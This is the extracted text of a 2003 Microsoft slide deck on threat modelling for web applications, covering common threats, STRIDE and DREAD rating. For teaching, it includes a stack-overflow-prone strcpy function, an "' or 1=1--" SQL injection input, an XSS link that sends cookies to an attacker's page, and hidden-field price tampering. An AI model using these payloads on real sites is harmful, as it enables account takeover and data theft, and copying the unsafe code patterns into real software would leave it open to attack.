Threat Modeling for Secure Web Application Development Rafal Lukawiecki Strategic Consultant Project Botticelli Ltd

2 2Objectives Introduce the challenges Introduce some common threats Overview threat modelling process Stress the weaknesses

The Challenges

4 4Security Definition (Cambridge Dictionary of English) Ability to avoid being harmed by any risk, danger or threat …therefore, in practice, an impossible goal  What can we do then? Be as secure as needed Ability to avoid being harmed too much by reasonably predictable risks, dangers or threats (Rafal’s Definition)

5 5 1 st Conclusion As 100% security is impossible, you need to decide what needs to be secured and how well it needs to be secured In other words, you need: Process and approach for designing in security

6 6Challenge Security must be balanced with usability (and accessibility) Most secure = useless Most useful = insecure Know the balance, based on risk analysis

7 7 Holistic Approach Security is the relationship of the elements of the system NetworkHostApplicationOrganisationPeoplePolitics Strengthening one often decreases security of the whole

8 8 Security is Expensive And now it seems to be increasingly more important than: PerformanceFeature-richness Prioritising features or performance over security must be a conscious choice Very dangerous Unlikely to survive in the long-term

9 9 Improving the Application Development Process Consider Security At the start of the process Throughout development Through deployment All software review milestones Think of security as a process, not a feature or even a state

The Threats

11 Potential Attackers Thieves Confidence tricksters VandalsCriminalsHackers It should be no surprise that attacks occur!

12 Types of Threats Spoofed packets, etc. Buffer overflows, illicit paths, etc. SQL injection, XSS, input tampering, etc. NetworkHostApplication Threats against the network Threats against the host Threats against the application

13 Threats Against the Network ThreatExamples Information gathering Port scanning Using trace routing to detect network topologies Using broadcast requests to enumerate subnet hosts Eavesdropping Using packet sniffers to steal passwords Denial of service (DoS) SYN floods ICMP echo request floods Malformed packets Spoofing Packets with spoofed source addresses i frame=true#c _004

14 Threats Against the Host ThreatExamples Arbitrary code execution Buffer overflows in ISAPI DLLs (e.g., MS01-033) Directory traversal attacks (MS00-078) File disclosure Malformed HTR requests (MS01-031) Virtualized UNC share vulnerability (MS00-019) Denial of service (DoS) Malformed SMTP requests (MS02-012) Malformed WebDAV requests (MS01-016) Malformed URLs (MS01-012) Brute-force file uploads Unauthorized access Resources with insufficiently restrictive ACLs Spoofing with stolen login credentials Exploitation of open ports and protocols Using NetBIOS and SMB to enumerate hosts Connecting remotely to SQL Server i frame=true#c _004

15 Threats Against the Application ThreatExamples SQL injection Including a DROP TABLE command in text typed into an input field Cross-site scripting Using malicious client-side script to steal cookies Hidden-field tampering Maliciously changing the value of a hidden field Eavesdropping Using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections Session hijacking Using a stolen session ID cookie to access someone else's session state Identity spoofing Using a stolen forms authentication cookie to pose as another user Information disclosure Allowing client to see a stack trace when an unhandled exception occurs frame=true#c _004 i

16 Most Common Threats Buffer Overrun SQL Injection Cross-Site Scripting Hidden-Field Tampering Session Hijacking Identity Spoofing Information Disclosure

17 What Is a Buffer Overrun? Occurs when data exceeds the expected size and overwrites other values Exists primarily in unmanaged C/C++ code Includes four types: Stack-based buffer overruns Heap overruns V-table and function pointer overwrites Exception handler overwrites Can be exploited by worms

18 Possible Results of Buffer Overruns Possible ResultAttacker’s Goal Access violation To perform denial of service attacks against servers Instability To disrupt the normal operation of software Code Injection To gain privileges for their own code To exploit vital business data To perform destructive actions

19 void UnSafe (const char* uncheckedData) { int anotherLocalVariable; strcpy (localVariable, uncheckedData); } char localVariable[4]; Stack-Based Buffer Overrun Example Top of Stack char[4] int Return address

20 SQL Injection Exploits applications that use external input in database commands Input from fields Input from query strings The technique: Find a field or query string parameter used to generate SQL commands Submit input that modifies the commands Compromise, corrupt, and destroy data

21 How SQL Injection Works “SELECT COUNT (*) FROM Users WHERE UserName=‘” & Field1.Text & “’ AND Password=‘” & Field2.Text & “’” SELECT COUNT (*) FROM Users WHERE UserName=‘’ or 1=1-- AND Password=‘’ “Model” Query Malicious Query – user enters: ‘ or 1=1-- "or 1=1" matches every record in the table "--" comments out the remainder of the query

22 Cross-Site Scripting (XSS) Exploits applications that echo raw, unfiltered input to Web pages Input from fields Input from query strings The technique: Find a field or query string parameter whose value is echoed to the Web page Enter malicious script and get an unwary user to navigate to the infected page Steal cookies, deface and disable sites

23 How Cross-Site Scripting Works <a href=" Search= document.location.replace (' Cookie=‘ + document.cookie); ">… Query string contains embedded JavaScript that redirects to attacker’s page and transmits cookies issued by Search.aspx in a query string URL of the site targeted by the attack

24 Hidden-Field Tampering Web developers sometimes use hidden fields to persist data between requests Hidden fields are not really hidden!

25 How HF Tampering Works <input type=“hidden” name="price" value="$10,000"> Page contains this… Postback data should contain this… price="$10,000" Instead it contains this… price="$1" type="hidden" prevents the field from being seen on the page but not in View Source

26 Session Hijacking Web applications use sessions to store state Sessions are private to individual users Sessions can be compromised ThreatRisk Factor Theft and replay of session ID cookiesHigh* Links to sites that use cookieless session stateMedium* Predictable session IDsLow* Remote connection to state server serviceMedium Remote connection to state server databaseMedium Eavesdropping on state server connectionMedium * Shorter session time-outs mitigate the risk by reducing the attack window

27 Identity Spoofing ThreatRisk Factor Theft of Windows authentication credentials High Theft of forms authentication credentials High Theft and replay of authentication cookies Medium* Dictionary attacks and password guessing High Security depends on authentication If authentication can be compromised, security goes out the window Authentication can be compromised * Depends on the time-out values assigned to authentication cookies

28 Information Disclosure Which is the better error message?

The Process

30 SD 3 Security Framework Secure Architecture and Code Threat Analysis Vulnerability Reduction Secure by Design Secure by Default Secure in Deployment Attack Surface Reduced Unused Features Off By Default Minimum Privileges Used Protection: Detect, Defend, Recover, Manage Process: Guides People: Training

31 Identifying Threats Understand the problem to find the solution Two approaches Look at lists of common threats and see which apply to your application Threat Modeling

32 Threat Modeling Structured analysis aimed at: Finding product vulnerabilities Evaluating security threats Identify countermeasures Forms basis of Security Specification 1. Identify Assets 2. Create an Architecture Overview 3. Decompose the Application 4. Identify the Threats 5. Document the Threats 6. Rate the Threats

33 Identify Assets What do you need to protect? Confidential data OrdersCustomers Web Pages Availability What is important? 1. Identify Assets 2. Create an Architecture Overview 3. Decompose the Application 4. Identify the Threats 5. Document the Threats 6. Rate the Threats

34 Create Architecture Overview (Documenting Your Architecture) Identify what the application does Create an architecture diagram Identify the technologies used 1. Identify Assets 2. Create an Architecture Overview 3. Decompose the Application 4. Identify the Threats 5. Document the Threats 6. Rate the Threats

35 Architecture Diagram Bob Alice Bill Asset #4 Asset #1Asset #2Asset #3 Asset #5Asset #6 IISASP.NET Web Server Login State Main Database Server Firewall

36 Decompose Application Identify trust boundaries Identify data flow Identify entry points Identify privileged code Document the security profile Architecture & Design Review 1. Identify Assets 2. Create an Architecture Overview 3. Decompose the Application 4. Identify the Threats 5. Document the Threats 6. Rate the Threats

37 Decomposition Bob Alice Bill IISASP.NET Web Server Database Server Trust Forms AuthenticationURL Authorization DPAPIWindows Authentication Firewall Login State Main

38 Identify Threats Use STRIDE to identify threats Use categorized threat lists NetworkHostApplication 1. Identify Assets 2. Create an Architecture Overview 3. Decompose the Application 4. Identify the Threats 5. Document the Threats 6. Rate the Threats

39 How Are Threats Evaluated Type of Threat Examples Spoofing Forging Message Replaying Authentication Tampering Altering data during transmission Changing data in database Repudiation Delete critical data and deny it Purchase product and deny it Information disclosure Expose information in error messages Expose code on web site Denial of Service Flood web service with invalid request Flood network with SYN Elevation of Privilege Obtain Administrator privileges Use assembly in GAC to create acct

40 Threat Trees Theft of Auth Cookies Theft of Auth Cookies Obtain auth cookie to spoof identity Unencrypted Connection Unencrypted Connection Cookies travel over unencrypted HTTP Eavesdropping Attacker uses sniffer to monitor HTTP traffic Cross-Site Scripting Cross-Site Scripting Attacker possesses means and knowledge XSS Vulnerability XSS Vulnerability Application is vulnerable to XSS attacks OR AND

41 Document Threats Document Threat Target Risk Attack Techniques Countermeasure Leave Risk Blank 1. Identify Assets 2. Create an Architecture Overview 3. Decompose the Application 4. Identify the Threats 5. Document the Threats 6. Rate the Threats

42 Document Threats DescriptionTargetRisk Attack Techniques Countermeasures Attacker obtains credentials User Auth process Sniffer Use SSL to encrypt channel Injection of SQL commands Data Access Component Append SQL to user name Validate user name Parameterized stored procedure for data access

43 Rate Threats Rate Risk Order by Risk Address in order Use DREAD 1. Identify Assets 2. Create an Architecture Overview 3. Decompose the Application 4. Identify the Threats 5. Document the Threats 6. Rate the Threats Risk’s Exposure = Probability * Damage Potential

44 Rating Threats Simple model based on concept of risk exposure Risk = Probability * Damage Potential 1-10 Scale 1 = Least probable 10 = Most probable 1-10 Scale 1 = Least probable 10 = Most probable 1-10 Scale 1 = Least damage 10 = Most damage 1-10 Scale 1 = Least damage 10 = Most damage

45 Calculating Risk D – Damage Potential D – Damage Potential R – Reproducibility R – Reproducibility E – Exploitability E – Exploitability A – Affected Users A – Affected Users D – Discoverability D – Discoverability Rate each category High(3), Medium(2) and Low(1)

46 DREAD, Cont. High (3)Medium (2)Low (1) Damage potential Attacker can retrieve extremely sensitive data and corrupt or destroy data Attacker can retrieve sensitive data but do little else Attacker can only retrieve data that has little or no potential for harm Reproduc- ability Works every time; does not require a timing window Timing-dependent; works only within a time window Rarely works ExploitabiltyBart Simpson could do it Attacker must be somewhat knowledgeable and skilled Attacker must be VERY knowledgeable and skilled Affected usersMost or all usersSome usersFew if any users DiscoverabiltyAttacker can easily discover the vulnerability Attacker might discover the vulnerability Attacker will have to dig to discover the vulnerability

47 Calculating Risk Total Risk Levels High = Medium = 8-11 Low = 5-7 ThreatDREADTotalRating Attacker obtains credentials High Injection of SQL commands High

48 Plan & Review Based on the security risk list and the threat model, address the issues In order of priority Reassess security risks when: Overall design changes New threats become known At regular intervals

49 Summary We have enough fast, feature-rich and insecure applications Design with security or start losing your business Security “testing” does not exist (yet?) Security paranoia is a good trait Use best design patterns, practices and processes

50 © 2003 Microsoft Limited. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.